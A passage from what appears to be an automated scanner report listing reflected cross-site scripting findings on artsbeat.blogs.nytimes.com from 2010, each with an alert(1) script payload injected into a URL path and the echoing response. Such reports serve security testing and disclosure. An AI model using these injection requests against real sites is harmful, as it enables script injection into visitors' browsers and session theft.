Host:   http://artsbeat.blogs.nytimes.com
Path:   /category/music/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0781"><script>alert(1)</script>63dd7b81cef was submitted in the REST URL parameter 2. This input was echoed as f0781\"><script>alert(1)</script>63dd7b81cef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/musicf0781"><script>alert(1)</script>63dd7b81cef/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/musicf0781\"><script>alert(1)</script>63dd7b81cef&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.46. http://artsbeat.blogs.nytimes.com/category/new-york-city/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /category/new-york-city/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78201"><script>alert(1)</script>9bba86db8b1 was submitted in the REST URL parameter 2. This input was echoed as 78201\"><script>alert(1)</script>9bba86db8b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/new-york-city78201"><script>alert(1)</script>9bba86db8b1/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/new-york-city78201\"><script>alert(1)</script>9bba86db8b1&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.47. http://artsbeat.blogs.nytimes.com/category/television/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /category/television/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ca6e"><script>alert(1)</script>e1cf7713b07 was submitted in the REST URL parameter 2. This input was echoed as 6ca6e\"><script>alert(1)</script>e1cf7713b07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/television6ca6e"><script>alert(1)</script>e1cf7713b07/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/television6ca6e\"><script>alert(1)</script>e1cf7713b07&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.48. http://artsbeat.blogs.nytimes.com/category/theater/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /category/theater/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8370"><script>alert(1)</script>08e1b6da719 was submitted in the REST URL parameter 2. This input was echoed as f8370\"><script>alert(1)</script>08e1b6da719 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/theaterf8370"><script>alert(1)</script>08e1b6da719/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/theaterf8370\"><script>alert(1)</script>08e1b6da719&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.49. http://artsbeat.blogs.nytimes.com/tag/amc/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /tag/amc/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43f1c"><script>alert(1)</script>41d4afcb6d4 was submitted in the REST URL parameter 2. This input was echoed as 43f1c\"><script>alert(1)</script>41d4afcb6d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/amc43f1c"><script>alert(1)</script>41d4afcb6d4/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/amc43f1c\"><script>alert(1)</script>41d4afcb6d4&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.50. http://artsbeat.blogs.nytimes.com/tag/anatomy-of-a-scene/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /tag/anatomy-of-a-scene/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7e99"><script>alert(1)</script>6201528606d was submitted in the REST URL parameter 2. This input was echoed as e7e99\"><script>alert(1)</script>6201528606d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/anatomy-of-a-scenee7e99"><script>alert(1)</script>6201528606d/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:14 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/anatomy-of-a-scenee7e99\"><script>alert(1)</script>6201528606d&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.51. http://artsbeat.blogs.nytimes.com/tag/chris-pine/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /tag/chris-pine/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ef3a"><script>alert(1)</script>8b298f2fb19 was submitted in the REST URL parameter 2. This input was echoed as 4ef3a\"><script>alert(1)</script>8b298f2fb19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/chris-pine4ef3a"><script>alert(1)</script>8b298f2fb19/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/chris-pine4ef3a\"><script>alert(1)</script>8b298f2fb19&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.52. http://artsbeat.blogs.nytimes.com/tag/denzel-washington/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /tag/denzel-washington/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69bb6"><script>alert(1)</script>38050bcc525 was submitted in the REST URL parameter 2. This input was echoed as 69bb6\"><script>alert(1)</script>38050bcc525 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/denzel-washington69bb6"><script>alert(1)</script>38050bcc525/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/denzel-washington69bb6\"><script>alert(1)</script>38050bcc525&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.53. http://artsbeat.blogs.nytimes.com/tag/hip-hop/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /tag/hip-hop/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e7b7"><script>alert(1)</script>58c4fa3e928 was submitted in the REST URL parameter 2. This input was echoed as 1e7b7\"><script>alert(1)</script>58c4fa3e928 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/hip-hop1e7b7"><script>alert(1)</script>58c4fa3e928/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:53 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/hip-hop1e7b7\"><script>alert(1)</script>58c4fa3e928&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.54. http://artsbeat.blogs.nytimes.com/tag/james-levine/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /tag/james-levine/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71b07"><script>alert(1)</script>db7048b06c8 was submitted in the REST URL parameter 2. This input was echoed as 71b07\"><script>alert(1)</script>db7048b06c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/james-levine71b07"><script>alert(1)</script>db7048b06c8/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/james-levine71b07\"><script>alert(1)</script>db7048b06c8&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.55. http://artsbeat.blogs.nytimes.com/tag/kanye-west/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /tag/kanye-west/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14892"><script>alert(1)</script>f62c755879a was submitted in the REST URL parameter 2. This input was echoed as 14892\"><script>alert(1)</script>f62c755879a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/kanye-west14892"><script>alert(1)</script>f62c755879a/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/kanye-west14892\"><script>alert(1)</script>f62c755879a&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.56. http://artsbeat.blogs.nytimes.com/tag/matt-lauer/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /tag/matt-lauer/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3a44"><script>alert(1)</script>7a33a3a08b8 was submitted in the REST URL parameter 2. This input was echoed as d3a44\"><script>alert(1)</script>7a33a3a08b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/matt-lauerd3a44"><script>alert(1)</script>7a33a3a08b8/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/matt-lauerd3a44\"><script>alert(1)</script>7a33a3a08b8&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.57. http://artsbeat.blogs.nytimes.com/tag/metropolitan-opera/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /tag/metropolitan-opera/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72636"><script>alert(1)</script>fe25915fda2 was submitted in the REST URL parameter 2. This input was echoed as 72636\"><script>alert(1)</script>fe25915fda2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/metropolitan-opera72636"><script>alert(1)</script>fe25915fda2/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:39 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/metropolitan-opera72636\"><script>alert(1)</script>fe25915fda2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.58. http://artsbeat.blogs.nytimes.com/tag/rubicon/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /tag/rubicon/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8df76"><script>alert(1)</script>36a7ef473d7 was submitted in the REST URL parameter 2. This input was echoed as 8df76\"><script>alert(1)</script>36a7ef473d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/rubicon8df76"><script>alert(1)</script>36a7ef473d7/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:39 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/rubicon8df76\"><script>alert(1)</script>36a7ef473d7&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.59. http://artsbeat.blogs.nytimes.com/tag/the-nutcracker-chronicles/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /tag/the-nutcracker-chronicles/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8d81"><script>alert(1)</script>c72ce13dac8 was submitted in the REST URL parameter 2. This input was echoed as c8d81\"><script>alert(1)</script>c72ce13dac8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/the-nutcracker-chroniclesc8d81"><script>alert(1)</script>c72ce13dac8/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:27 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
